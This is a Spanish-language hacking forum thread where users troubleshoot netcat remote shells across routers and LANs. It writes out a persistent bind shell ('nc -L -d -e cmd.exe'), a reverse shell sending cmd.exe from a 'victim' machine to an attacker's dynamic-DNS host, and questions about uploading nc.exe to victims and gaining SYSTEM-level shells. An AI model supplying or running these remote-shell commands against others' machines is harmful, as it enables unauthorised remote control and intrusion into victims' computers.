transit
|
Hola Veran mi problema es el siguiente: Tengo un area local en casa y quiero q un amigo se conecte ami mediante el netcat, lo q hago es abrir el puerto del router numero 76 y q por tanto todo la informacion q entre por ese puerto m la mande a 192.168.0.3 q es mi ip dentro del area local, entonces dejo en escuxa el puerto 76 en mi maquina nc -L -d -e cmd.exe -p76, entonces el amigo se intenta conectar a traves del nc con mi ip externa de la siguiente forma nc 80.xx.xx.xx 76 , pero no sale nada q estoy aciendo mal????? gracias
|
|
|
|
|
|
|
|
|
BloodeR
|
tu amigo debe hacer: nc -vv xx.xx.xx.xx 76 y vos fijate dps de la -p de dejar el espacio, pq lo escribiste sin espacio ahi..
suert.e.
|
|
|
|
|
|
|
|
|
transit
|
Me sigue sin funcionar aunque aora lo que m pone cuando intento conectar desde otro pc de la siguiente forma nc -vv ipexterna 76 es mi ip e isp y posteriormente añade timedout send 0 recived 0.
Otra cosa al escanearme con nmap mi ip externo(no la interna) m aparece el puerte 76 q se supone q e abierto como filtered, no deberia de poner open??? saludos
|
|
|
|
|
|
|
|
|
BloodeR
|
te pasa lo mismo a q mi.. de vez en cuando no se q merda le pasa y aparece timedout.. yo en esos casos reinicio la pc donde se keda el puerto a la escucha.. y dps intento otra vez y funciona, pero no se pq pasa eso..
|
|
|
|
|
|
|
|
|
transit
|
Ola wenas noxes Ya consegui solucionar el problema, el fallo estaba, weno mejor dixo no abia ningun fallo, lo que pasaba esque yo acia las pruebas de nc miip puerto desde un ordenador de mi misma red local no desde un ordenador de fuera de la red y por ello no funciona ya q al enviar una informacion ati mismo se crea un socket y no es posible realizar la conexion. Saludos. Pd: si necesitais ayuda sobre este tema os intentare ayudar en lo posible 
|
|
|
|
|
|
|
|
|
|
zhyzura
|
recuerden tambien que si estan detras de una red y quieren acceder desde otra que esta fuera tienen que mapear los puertos del router...
|
|
|
|
|
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des Wissens ist unersättlich
|
|
|
transit
|
Oie una cosa zhizura, m puedes recomendar algun programa para administrar los puertos del router, e visto muxos por ay pero no se cual sera bueno y la verdad sq no m gusta abrir los puertos poniendo la puerta de enlace en el navegador  Muchas gracias
|
|
|
|
|
|
|
|
|
BloodeR
|
che y mi problema no saben q puede ser?.. la makina q tiene el puerto a la escucha puedo acceder una sola vez, dps q cierro la ventana de comandos en la pc victimaria no puedo abrir otra vez la conexión, me aparece timedout sent=0 received=0
|
|
|
|
|
|
|
|
|
|
zhyzura
|
@ transit
a menos de que tu router tuviese una utilidad asi como tu quieres, no creo que tengas otra alternativa para administrarlo que no sea via web o telnet...
@ Blooder
en lugar de dejar el netcat a la escucha con la opcion -l haslo con la opcion -L y asi ya podra hacer la conexion cuantas veces lo quieras.
|
|
|
|
|
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des Wissens ist unersättlich
|
|
|
|
|
cristhiams
|
todo esto funciona bien en xp y 2k pero he intentado en win98 con command y no me resulta. si alguien supiera hacerlo en win98
|
|
|
|
|
|
|
|
|
seiyajv
|
donde puedo conseguir descargar el netcat lo encontre en una web pero no me funciono ademas si antes de empezar a usarlo para conseguir una shell remota hay que subir el archivo nc.exe que se consuigue al descargar el netcat a la victima como lo hago por tftp si no tengo la shell remota segun el manual dice eso
|
|
|
|
|
|
|
|
|
jotavich
|
eso esta todo bien, pero el comnado nc no lo ejecuta el cmd de windows alguien me ayuda co eso?
gracias
|
|
|
|
|
|
|
|
|
riklop
|
creo que voy a tener que verificar eso por que a mi no me salio ninguna ventana ya que la shell se ejecuta con privilegios de system[/font] y por lo yanto no debe de aparecer ninguna ventana ya que system trabaja en otro entorno muy diferente al del usuario.
muy buen manual zhyzura, he probado el netcat... bueno tengo una lan en mi casa, en mi pc con winxp sp2 dejo el netcat a la escucha y me conecto a ella desde una pc con win98se, obtengo la shell pero no con privilegios de system como lo mencionas lineas arriba sino que obtengo la shell con los privilegios del usuario que inicie sesion (si es administrador obtengo esa shell y si es invitado obtengo la shell del invitado)... aqui va mi pregunta: ¿como puedo hacer para obtener la shell con privilegios de system?? 
|
|
|
|
|
|
|
|
|
servero
|
Tengo un problema con la Reverse Shell: Los dos equipos son xp prof. sp2 victima 192.168.1.33 atacante 192.168.1.34 en el equipo atacante: nc -vv -l -p 80 ----> tambien probe nc -v -v nc -vv -l -p 25 en la victima: nc -d -e cmd.exe www.nimombre.no-ip-info 80 nc -d -e cmd.exe www.nimombre.no-ip-info 25 el no-ip DUC conectado y con la carita  No hay forma de que conecte, probe sacarle a la victima la -d para ver lo que sucedia y me pone esto: Warning: forward host lookup failed for www.minombre.no-ip.info : h-herno 1100...... que puede ser?? saludos
|
|
|
|
|
|
|
|
|
|